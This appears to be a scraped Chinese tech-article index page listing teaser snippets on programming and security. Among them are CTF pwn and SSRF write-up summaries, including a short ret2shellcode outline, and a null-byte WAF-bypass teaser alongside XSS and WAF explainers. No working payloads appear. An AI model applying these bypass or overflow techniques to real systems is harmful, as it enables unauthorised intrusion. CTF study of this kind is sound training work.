<div>*需要的小伙伴关注我第一阶段：基础操作入门，学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍，一般来说这个过程在1个月左右比较合适。在这个阶段，你已经对网络安全有了基本的了解。如果你学完了第一步，相信你已经在理论上明白了上面是sql注入，什么是xss攻击，对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基！所谓的“打地基”其实就是系统化的</div> </li> <li><a href="/article/1833963182201335808.htm" title="网络攻防WEB入门指南" target="_blank">网络攻防WEB入门指南</a> youhao108 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2/1.htm">网络攻防</a><a class="tag" taget="_blank" href="/search/web/1.htm">web</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2/1.htm">网络攻防</a> <div>网络攻防WEB入门指南（大佬绕路）文章目录前言学习网络攻防该如何入门前言我对网络攻防的理解，分为比赛和实战两个部分，两者所学习的知识虽有共通之处，但还是有很大区别，我也在向实战的状态转换，不过二者入门所要掌握的知识差别不大。下面主要从网络攻防竞赛角度，也就是知名的CTF夺旗赛，来谈谈网络攻防知识如何入门。学习网络攻防该如何入门常规CTF比赛主要分为线上做题，以及线下AWD攻防（AttackWith</div> </li> <li><a href="/article/1833962043733012480.htm" title="软考 - 系统架构设计师 - 设计模式" target="_blank">软考 - 系统架构设计师 - 设计模式</a> 小林想被监督学习 <a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E6%9E%B6%E6%9E%84%E8%AE%BE%E8%AE%A1%E5%B8%88/1.htm">系统架构设计师</a><a class="tag" taget="_blank" href="/search/%E7%B3%BB%E7%BB%9F%E6%9E%B6%E6%9E%84/1.htm">系统架构</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a> <div>目录概念创建型设计模式抽象工厂模式（AbstractFactoryPattern）优点缺点应用场景总结构建器模式（BuilderPattern）优点缺点应用场景工厂方法模式（factorymethod）优点缺点应用场景原型模式（prototype）优点缺点应用场景单例模式（Singleton）优点缺点应用场景结构型设计模式适配器模式（Adapter）优点缺点应用场景桥接模式（Bridge）优点缺点</div> </li> <li><a href="/article/1833904168012705792.htm" title="ctfshow web入门 ssrf web351~web360" target="_blank">ctfshow web入门 ssrf web351~web360</a> kikkeve <a class="tag" taget="_blank" href="/search/ctfshow/1.htm">ctfshow</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>目录SSRF基础web351web352、353web354web355web356web357web358web359web360SSRF基础SSRF(Server-SideRequestForgery:服务器端请求伪造)就是让服务器去请求服务器的资源，因为我们远程请求不到。curl_init()：初始curl会话curl_setopt()：会话设置curl_exec()：执行curl会话,获取</div> </li> <li><a href="/article/1833897232701681664.htm" title="flutter 一键打出不同包名、应用名、版本名、签名、应用图标、版本号的安装包" target="_blank">flutter 一键打出不同包名、应用名、版本名、签名、应用图标、版本号的安装包</a> Sindyue <a class="tag" taget="_blank" href="/search/flutter/1.htm">flutter</a> <div>1.build.gradle文件中配置不同的应用信息flavorDimensions"app"productFlavors{app1{//配置包名manifestPlaceholders=[str:"releaseStr",package_name:"com.example.demo1"]applicationId"com.example.demo1"versionCode1versionName</div> </li> <li><a href="/article/1833854241643524096.htm" title="CTF 竞赛密码学方向学习路径规划" target="_blank">CTF 竞赛密码学方向学习路径规划</a> David Max <a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1.htm">学习笔记</a><a class="tag" taget="_blank" href="/search/%E5%AF%86%E7%A0%81%E5%AD%A6/1.htm">密码学</a><a class="tag" taget="_blank" href="/search/ctf/1.htm">ctf</a><a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a> <div>目录计算机科学基础计算机科学概念的引入、兴趣的引导开发环境的配置与常用工具的安装WattToolkit（Steam++）、机场代理Scoop（Windows用户可选）常用Python库SageMathLinux小工具yafuOpenSSLMarkdown编程基础Python其他编程语言、算法与数据结构（可选）数学基础离散数学与抽象代数复杂性分析密码学的正式学习兴趣的培养做题小技巧系统学习需要了解并</div> </li> <li><a href="/article/1833830664764485632.htm" title="微信小程序入门【三】：实现简单登录退出和个人信息页面" target="_blank">微信小程序入门【三】：实现简单登录退出和个人信息页面</a> 山岫 <a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a> <div>效果图预览这个框很是惆怅，但是真机调试没出现过，这个bug下次再解决吧。这次说说登录。效果图：附上代码：home.wxml-->-->-->-->Hi游客{{userInfo.nickName}}-->退出登录@技术支持：江阔jk921home.wxss/*pages/scroll/scroll.wxss*/.top{width:100%;height:400rpx;background-colo</div> </li> <li><a href="/article/1833830286404710400.htm" title="Web应用防火墙" target="_blank">Web应用防火墙</a> Smile灬凉城666 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/WAF/1.htm">WAF</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a> <div>一、定义与目的WAF是一种特殊类型的防火墙，专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS（跨站脚本）、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层，即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说，WAF会解析进入Web应用的HTTP/HTTPS请求</div> </li> <li><a href="/article/1833821079899041792.htm" title="如何识别和防范跨站脚本攻击（XSS）？" target="_blank">如何识别和防范跨站脚本攻击（XSS）？</a> 盼盼盼 <a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>识别和防范跨站脚本攻击（XSS）需要一系列的措施，包括输入验证、输出编码、安全配置和用户教育。以下是一些关键步骤：识别XSS异常行为：观察网站行为是否异常，例如页面上突然出现未经预期的内容或功能。错误消息：检查错误消息中是否包含敏感信息，这可能是由于未经过滤的输入导致的。安全工具：使用浏览器插件或安全扫描工具来检测潜在的XSS漏洞。代码审计：定期进行代码审计，查找可能的安全漏洞，特别是在处理用户输</div> </li> <li><a href="/article/1833787042304192512.htm" title="MySQL8.0新特性~最左前缀匹配原则被打破了" target="_blank">MySQL8.0新特性~最左前缀匹配原则被打破了</a> 进击的CJR <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a> <div>测试在MySQL8.0.25和mysql5.7.33中创建如下CREATETABLEt1(f1INTNOTNULL,f2INTNOTNULL,PRIMARYKEY(f1,f2));INSERTINTOt1VALUES(1,1),(1,2),(1,3),(1,4),(1,5),(2,1),(2,2),(2,3),(2,4),(2,5);INSERTINTOt1SELECTf1,f2+5FROMt1;</div> </li> <li><a href="/article/1833724408523485184.htm" title="hackcon ctf 2018 | pwn wp" target="_blank">hackcon ctf 2018 | pwn wp</a> fantasy_learner <div>BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点，得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出，输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久，卡在了能否根据_d</div> </li> <li><a href="/article/1833713785567801344.htm" title="【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF" target="_blank">【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF</a> 秋说 <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a> <div>未经许可，不得转载。文章目录空字节URL回调XSSSQL空字节\0，也称为null字节，是一个值为零的特殊字符。在编程中，通常用来表示字符串的结束。攻击者可以利用null字节注入来绕过一些验证或过滤机制。以下三个漏洞，空字节功不可没。URL回调密码重置功能，发起请求后，邮箱会收到链接。请求包中存在callbackUrl参数：在参数中添加/test，发包后，邮箱中的链接为https://compan</div> </li> <li><a href="/article/1833694749207392256.htm" title="BUUCTF 2021-10-4 Pwn" target="_blank">BUUCTF 2021-10-4 Pwn</a> Ch1lkat <a class="tag" taget="_blank" href="/search/BUUCTF/1.htm">BUUCTF</a><a class="tag" taget="_blank" href="/search/Pwn/1.htm">Pwn</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/pwn/1.htm">pwn</a> <div>文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe</div> </li> <li><a href="/article/1833693867304644608.htm" title="C# 关于多线程同步不同实现方式" target="_blank">C# 关于多线程同步不同实现方式</a> 語衣 <a class="tag" taget="_blank" href="/search/C%23/1.htm">C#</a><a class="tag" taget="_blank" href="/search/%E7%9F%A5%E8%AF%86%E8%A1%A5%E5%85%85/1.htm">知识补充</a><a class="tag" taget="_blank" href="/search/c%23/1.htm">c#</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a> <div>栏目总目录AutoResetEventclassMainClass{//thearrayofconsumerthreadsprivatestaticListconsumers=newList();//thetaskqueueprivatestaticQueuetasks=newQueue();//thesynchronisationobjectforlockingthetaskqueuepriva</div> </li> <li><a href="/article/26.htm" title="设计模式介绍" target="_blank">设计模式介绍</a> tntxia <a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a> <div>设计模式来源于土木工程师克里斯托弗亚历山大（http://en.wikipedia.org/wiki/Christopher_Alexander）的早期作品。他经常发表一些作品，内容是总结他在解决设计问题方面的经验，以及这些知识与城市和建筑模式之间有何关联。有一天，亚历山大突然发现，重复使用这些模式可以让某些设计构造取得我们期望的最佳效果。亚历山大与萨拉-石川佳纯和穆雷西乐弗斯坦合作</div> </li> <li><a href="/article/153.htm" title="android高级组件使用(一)" target="_blank">android高级组件使用(一)</a> 百合不是茶 <a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/RatingBar/1.htm">RatingBar</a><a class="tag" taget="_blank" href="/search/Spinner/1.htm">Spinner</a> <div>1、自动完成文本框（AutoCompleteTextView） AutoCompleteTextView从EditText派生出来，实际上也是一个文本编辑框，但它比普通编辑框多一个功能：当用户输入一个字符后，自动完成文本框会显示一个下拉菜单，供用户从中选择，当用户选择某个菜单项之后，AutoCompleteTextView按用户选择自动填写该文本框。使用AutoCompleteTex</div> </li> <li><a href="/article/280.htm" title="[网络与通讯]路由器市场大有潜力可挖掘" target="_blank">[网络与通讯]路由器市场大有潜力可挖掘</a> comsci <a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div> 如果国内的电子厂商和计算机设备厂商觉得手机市场已经有点饱和了,那么可以考虑一下交换机和路由器市场的进入问题..... 这方面的技术和知识,目前处在一个开放型的状态,有利于各类小型电子企业进入 &nbs</div> </li> <li><a href="/article/407.htm" title="自写简单Redis内存统计shell" target="_blank">自写简单Redis内存统计shell</a> 商人shang <a class="tag" taget="_blank" href="/search/Linux+shell/1.htm">Linux shell</a><a class="tag" taget="_blank" href="/search/%E7%BB%9F%E8%AE%A1Redis%E5%86%85%E5%AD%98/1.htm">统计Redis内存</a> <div>#!/bin/bash address="192.168.150.128:6666,192.168.150.128:6666" hosts=(${address//,/ }) sfile="staticts.log" for hostitem in ${hosts[@]} do ipport=(${hostitem</div> </li> <li><a href="/article/534.htm" title="单例模式(饿汉 vs懒汉)" target="_blank">单例模式(饿汉 vs懒汉)</a> oloz <a class="tag" taget="_blank" href="/search/%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F/1.htm">单例模式</a> <div>package 单例模式; /* * 应用场景:保证在整个应用之中某个对象的实例只有一个 * 单例模式种的《懒汉模式》 * */ public class Singleton { //01 将构造方法私有化，外界就无法用new Singleton()的方式获得实例 private Singleton(){}; //02 申明类得唯一实例 priva</div> </li> <li><a href="/article/661.htm" title="springMvc json支持" target="_blank">springMvc json支持</a> 杨白白 <a class="tag" taget="_blank" href="/search/json+springmvc/1.htm">json springmvc</a> <div>1.Spring mvc处理json需要使用jackson的类库，因此需要先引入jackson包 2在spring mvc中解析输入为json格式的数据:使用@RequestBody来设置输入 @RequestMapping("helloJson") public @ResponseBody JsonTest helloJson() { </div> </li> <li><a href="/article/788.htm" title="android播放，掃描添加本地音頻文件" target="_blank">android播放，掃描添加本地音頻文件</a> 小桔子 <div> 最近幾乎沒有什麽事情，繼續鼓搗我的小東西。想在項目中加入一個簡易的音樂播放器功能，就像華為p6桌面上那麼大小的音樂播放器。用過天天動聽或者QQ音樂播放器的人都知道，可已通過本地掃描添加歌曲。不知道他們是怎麼實現的，我覺得應該掃描設備上的所有文件，過濾出音頻文件，每個文件實例化為一個實體，記錄文件名、路徑、歌手、類型、大小等信息。具體算法思想，</div> </li> <li><a href="/article/915.htm" title="oracle常用命令" target="_blank">oracle常用命令</a> aichenglong <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/dba/1.htm">dba</a><a class="tag" taget="_blank" href="/search/%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/1.htm">常用命令</a> <div>1 创建临时表空间 create temporary tablespace user_temp tempfile 'D:\oracle\oradata\Oracle9i\user_temp.dbf' size 50m autoextend on next 50m maxsize 20480m extent management local</div> </li> <li><a href="/article/1042.htm" title="25个Eclipse插件" target="_blank">25个Eclipse插件</a> AILIKES <a class="tag" taget="_blank" href="/search/eclipse%E6%8F%92%E4%BB%B6/1.htm">eclipse插件</a> <div>提高代码质量的插件1. FindBugsFindBugs可以帮你找到Java代码中的bug，它使用Lesser GNU Public License的自由软件许可。2. CheckstyleCheckstyle插件可以集成到Eclipse IDE中去，能确保Java代码遵循标准代码样式。3. ECLemmaECLemma是一款拥有Eclipse Public License许可的免费工具，它提供了</div> </li> <li><a href="/article/1169.htm" title="Spring MVC拦截器+注解方式实现防止表单重复提交" target="_blank">Spring MVC拦截器+注解方式实现防止表单重复提交</a> baalwolf <a class="tag" taget="_blank" href="/search/spring+mvc/1.htm">spring mvc</a> <div>原理：在新建页面中Session保存token随机码，当保存时验证，通过后删除，当再次点击保存时由于服务器端的Session中已经不存在了，所有无法验证通过。 1.新建注解： ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 </div> </li> <li><a href="/article/1296.htm" title="《Javascript高级程序设计(第3版)》闭包理解" target="_blank">《Javascript高级程序设计(第3版)》闭包理解</a> bijian1013 <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div>“闭包是指有权访问另一个函数作用域中的变量的函数。”--《Javascript高级程序设计(第3版)》看以下代码： <script type="text/javascript"> function outer() { var i = 10; return f</div> </li> <li><a href="/article/1423.htm" title="AngularJS Module类的方法" target="_blank">AngularJS Module类的方法</a> bijian1013 <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a><a class="tag" taget="_blank" href="/search/Module/1.htm">Module</a> <div> AngularJS中的Module类负责定义应用如何启动，它还可以通过声明的方式定义应用中的各个片段。我们来看看它是如何实现这些功能的。一.Main方法在哪里如果你是从Java或者Python编程语言转过来的，那么你可能很想知道AngularJS里面的main方法在哪里？这个把所</div> </li> <li><a href="/article/1550.htm" title="[Maven学习笔记七]Maven插件和目标" target="_blank">[Maven学习笔记七]Maven插件和目标</a> bit1129 <a class="tag" taget="_blank" href="/search/maven%E6%8F%92%E4%BB%B6/1.htm">maven插件</a> <div>插件(plugin)和目标(goal) Maven，就其本质而言，是一个插件执行框架，Maven的每个目标的执行逻辑都是由插件来完成的，一个插件可以有1个或者几个目标，比如maven-compiler-plugin插件包含compile和testCompile，即maven-compiler-plugin提供了源代码编译和测试源代码编译的两个目标使用插件和目标使得我们可以干预</div> </li> <li><a href="/article/1677.htm" title="【Hadoop八】Yarn的资源调度策略" target="_blank">【Hadoop八】Yarn的资源调度策略</a> bit1129 <a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a> <div>1. Hadoop的三种调度策略 Hadoop提供了3中作业调用的策略， FIFO Scheduler Fair Scheduler Capacity Scheduler 以上三种调度算法，在Hadoop MR1中就引入了，在Yarn中对它们进行了改进和完善.Fair和Capacity Scheduler用于多用户共享的资源调度 2. 多用户资源共享的调度 </div> </li> <li><a href="/article/1804.htm" title="Nginx使用Linux内存加速静态文件访问" target="_blank">Nginx使用Linux内存加速静态文件访问</a> ronin47 <div>Nginx是一个非常出色的静态资源web服务器。如果你嫌它还不够快，可以把放在磁盘中的文件，映射到内存中，减少高并发下的磁盘IO。先做几个假设。nginx.conf中所配置站点的路径是/home/wwwroot/res，站点所对应文件原始存储路径：/opt/web/res shell脚本非常简单，思路就是拷贝资源文件到内存中，然后在把网站的静态文件链接指向到内存中即可。具体如下： </div> </li> <li><a href="/article/1931.htm" title="关于Unity3D中的Shader的知识" target="_blank">关于Unity3D中的Shader的知识</a> brotherlamp <a class="tag" taget="_blank" href="/search/unity/1.htm">unity</a><a class="tag" taget="_blank" href="/search/unity%E8%B5%84%E6%96%99/1.htm">unity资料</a><a class="tag" taget="_blank" href="/search/unity%E6%95%99%E7%A8%8B/1.htm">unity教程</a><a class="tag" taget="_blank" href="/search/unity%E8%A7%86%E9%A2%91/1.htm">unity视频</a><a class="tag" taget="_blank" href="/search/unity%E8%87%AA%E5%AD%A6/1.htm">unity自学</a> <div>首先先解释下Unity3D的Shader，Unity里面的Shaders是使用一种叫ShaderLab的语言编写的，它同微软的FX文件或者NVIDIA的CgFX有些类似。传统意义上的vertex shader和pixel shader还是使用标准的Cg/HLSL 编程语言编写的。因此Unity文档里面的Shader，都是指用ShaderLab编写的代码，然后我们来看下Unity3D自带的60多个S</div> </li> <li><a href="/article/2058.htm" title="CopyOnWriteArrayList vs ArrayList" target="_blank">CopyOnWriteArrayList vs ArrayList</a> bylijinnan <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div>package com.ljn.base; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.concurrent.CopyOnWriteArrayList; /** * 总述： * 1.ArrayListi不是线程安全的，CopyO</div> </li> <li><a href="/article/2185.htm" title="内存中栈和堆的区别" target="_blank">内存中栈和堆的区别</a> chicony <a class="tag" taget="_blank" href="/search/%E5%86%85%E5%AD%98/1.htm">内存</a> <div> 1、内存分配方面：堆：一般由程序员分配释放，若程序员不释放，程序结束时可能由OS回收。注意它与数据结构中的堆是两回事，分配方式是类似于链表。可能用到的关键字如下：new、malloc、delete、free等等。栈：由编译器(Compiler)自动分配释放，存放函数的参数值，局部变量的值等。其操作方式类似于数据结构中</div> </li> <li><a href="/article/2312.htm" title="回答一位网友对Scala的提问" target="_blank">回答一位网友对Scala的提问</a> chenchao051 <a class="tag" taget="_blank" href="/search/scala/1.htm">scala</a><a class="tag" taget="_blank" href="/search/map/1.htm">map</a> <div>本来准备在私信里直接回复了，但是发现不太方便，就简要回答在这里。问题写道对于scala的简洁十分佩服，但又觉得比较晦涩，例如一例，Map("a" -> List(11,111)).flatMap(_._2)，可否说下最后那个函数做了什么，真正在开发的时候也会如此简洁？谢谢先回答一点，在实际使用中，Scala毫无疑问就是这么简单。</div> </li> <li><a href="/article/2439.htm" title="mysql 取每组前几条记录" target="_blank">mysql 取每组前几条记录</a> daizj <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E7%BB%84/1.htm">分组</a><a class="tag" taget="_blank" href="/search/%E6%9C%80%E5%A4%A7%E5%80%BC/1.htm">最大值</a><a class="tag" taget="_blank" href="/search/%E6%9C%80%E5%B0%8F%E5%80%BC/1.htm">最小值</a><a class="tag" taget="_blank" href="/search/%E6%AF%8F%E7%BB%84%E4%B8%89%E6%9D%A1%E8%AE%B0%E5%BD%95/1.htm">每组三条记录</a> <div>一、对分组的记录取前N条记录：例如：取每组的前3条最大的记录 1.用子查询： SELECT * FROM tableName a WHERE 3> (SELECT COUNT(*) FROM tableName b WHERE b.id=a.id AND b.cnt>a. cnt) ORDER BY a.id,a.account DE</div> </li> <li><a href="/article/2566.htm" title="HTTP深入浅出 http请求" target="_blank">HTTP深入浅出 http请求</a> dcj3sjt126com <a class="tag" taget="_blank" href="/search/http/1.htm">http</a> <div> HTTP(HyperText Transfer Protocol)是一套计算机通过网络进行通信的规则。计算机专家设计出HTTP，使HTTP客户（如Web浏览器）能够从HTTP服务器(Web服务器)请求信息和服务，HTTP目前协议的版本是1.1.HTTP是一种无状态的协议，无状态是指Web浏览器和Web服务器之间不需要建立持久的连接，这意味着当一个客户端向服务器端发出请求，然后We</div> </li> <li><a href="/article/2693.htm" title="判断MySQL记录是否存在方法比较" target="_blank">判断MySQL记录是否存在方法比较</a> dcj3sjt126com <a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a> <div>把数据写入到数据库的时，常常会碰到先要检测要插入的记录是否存在，然后决定是否要写入。　　我这里总结了判断记录是否存在的常用方法：　　sql语句： select count ( * ) from tablename; 　　然后读取count(*)的值判断记录是否存在。对于这种方法性能上有些浪费，我们只是想判断记录记录是否存在，没有必要全部都查出来。</div> </li> <li><a href="/article/2820.htm" title="对HTML XML的一点认识" target="_blank">对HTML XML的一点认识</a> e200702084 <a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a> <div>感谢http://www.w3school.com.cn提供的资料 HTML 文档中的每个成分都是一个节点。节点根据 DOM，HTML 文档中的每个成分都是一个节点。 DOM 是这样规定的：整个文档是一个文档节点每个 HTML 标签是一个元素节点包含在 HTML 元素中的文本是文本节点每一个 HTML 属性是一个属性节点注释属于注释节点 Node 层次 </div> </li> <li><a href="/article/2947.htm" title="jquery分页插件" target="_blank">jquery分页插件</a> genaiwei <a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E5%88%86%E9%A1%B5/1.htm">分页</a><a class="tag" taget="_blank" href="/search/%E6%8F%92%E4%BB%B6/1.htm">插件</a> <div>//jquery页码控件// 创建一个闭包 (function($) { // 插件的定义 $.fn.pageTool = function(options) { var totalPa</div> </li> <li><a href="/article/3201.htm" title="Mybatis与Ibatis对照入门于学习" target="_blank">Mybatis与Ibatis对照入门于学习</a> Josh_Persistence <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a><a class="tag" taget="_blank" href="/search/ibatis/1.htm">ibatis</a><a class="tag" taget="_blank" href="/search/%E5%8C%BA%E5%88%AB/1.htm">区别</a><a class="tag" taget="_blank" href="/search/%E8%81%94%E7%B3%BB/1.htm">联系</a> <div>一、为什么使用IBatis/Mybatis 对于从事 Java EE 的开发人员来说，iBatis 是一个再熟悉不过的持久层框架了，在 Hibernate、JPA 这样的一站式对象 / 关系映射（O/R Mapping）解决方案盛行之前，iBaits 基本是持久层框架的不二选择。即使在持久层框架层出不穷的今天，iBatis 凭借着易学易用、</div> </li> <li><a href="/article/3328.htm" title="C中怎样合理决定使用那种整数类型？" target="_blank">C中怎样合理决定使用那种整数类型？</a> 秋风扫落叶 <a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B/1.htm">数据类型</a> <div>如果需要大数值(大于32767或小于32767), 使用long 型。否则, 如果空间很重要 (如有大数组或很多结构), 使用 short 型。除此之外, 就使用 int 型。如果严格定义的溢出特征很重要而负值无关紧要, 或者你希望在操作二进制位和字节时避免符号扩展的问题, 请使用对应的无符号类型。但是, 要注意在表达式中混用有符号和无符号值的情况。 &nbs</div> </li> <li><a href="/article/3455.htm" title="maven问题" target="_blank">maven问题</a> zhb8015 <a class="tag" taget="_blank" href="/search/maven%E9%97%AE%E9%A2%98/1.htm">maven问题</a> <div> 问题1： Eclipse 中新建maven项目无法添加src/main/java 问题 eclipse创建maevn web项目，在选择maven_archetype_web原型后，默认只有src/main/resources这个Source Floder。按照maven目录结构，添加src/main/ja</div> </li> <li><a href="/article/3582.htm" title="(二)androidpn-server tomcat版源码解析之--push消息处理" target="_blank">(二)androidpn-server tomcat版源码解析之--push消息处理</a> spjich <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/androdipn/1.htm">androdipn</a><a class="tag" taget="_blank" href="/search/%E6%8E%A8%E9%80%81/1.htm">推送</a> <div>在 (一)androidpn-server tomcat版源码解析之--项目启动这篇中，已经描述了整个推送服务器的启动过程，并且把握到了消息的入口即XmppIoHandler这个类，今天我将继续往下分析下面的核心代码，主要分为3大块，链接创建，消息的发送，链接关闭。先贴一段XmppIoHandler的部分代码 /** * Invoked from an I/O proc</div> </li> <li><a href="/article/3709.htm" title="用js中的formData类型解决ajax提交表单时文件不能被serialize方法序列化的问题" target="_blank">用js中的formData类型解决ajax提交表单时文件不能被serialize方法序列化的问题</a> 中华好儿孙 <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6/1.htm">上传文件</a><a class="tag" taget="_blank" href="/search/FormData/1.htm">FormData</a> <div> var formData = new FormData($("#inputFileForm")[0]); $.ajax({ type:'post', url:webRoot+"/electronicContractUrl/webapp/uploadfile", data:formData, async: false, ca</div> </li> <li><a href="/article/3836.htm" title="mybatis常用jdbcType数据类型" target="_blank">mybatis常用jdbcType数据类型</a> ysj5125094 <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a><a class="tag" taget="_blank" href="/search/mapper/1.htm">mapper</a><a class="tag" taget="_blank" href="/search/jdbcType/1.htm">jdbcType</a> <div> MyBatis 通过包含的jdbcType 类型 BIT FLOAT CHAR </div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> 按字母分类： <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 